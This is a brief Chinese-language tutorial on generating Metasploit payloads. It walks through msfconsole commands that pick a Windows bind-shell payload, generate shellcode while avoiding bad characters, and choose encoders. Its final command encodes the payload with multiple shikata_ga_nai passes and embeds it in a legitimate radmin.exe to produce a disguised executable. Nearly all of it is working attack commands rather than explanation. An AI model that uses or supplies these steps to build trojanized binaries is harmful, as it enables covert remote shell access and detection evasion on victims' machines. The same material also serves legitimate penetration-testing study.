前言
使用exploit是爲了將payload在目標機上執行
1、payload使用
msfconsole
msf > show payloads #查看可用payload
msf > use payload/windows/shell_bind_tcp #這是個綁定端口shell
msf payload(windows/shell/bind_tcp) > show options #查看設置
msf payload(windows/shell/bind_tcp) > generate #獲得shellcode,是ruby語言寫的
msf payload(windows/shell/bind_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-E 強制編碼。
-b <opt> 要避免的字符列表:'\ x00 \ xff'
-e <opt> 要使用的編碼器模塊的名稱。
-f <opt> 輸出文件名(否則爲stdout)
-h 幫助橫幅。
-i <opt> 編碼迭代的次數。
-k 保持模板可執行的功能
-o <opt> 以VAR = VAL格式逗號分隔的選項列表。
-p <opt> 輸出平臺
-s <opt> NOP sled length.
-t <opt> 輸出格式: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
-x <opt> 要使用的可執行模板
#繞過壞字符
msf payload(windows/shell/bind_tcp) > generate -b '\x00'
msf payload(windows/shell/bind_tcp) > generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b' #generate會自動選擇最合適的
#如果要排除的壞字符太多,可能就沒有合適的shellcode了
#手動指定編碼模塊
msf payload(windows/shell/bind_tcp) > show encoders
#注入文件
msf payload(windows/shell/bind_tcp) > generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
結語
熟悉payload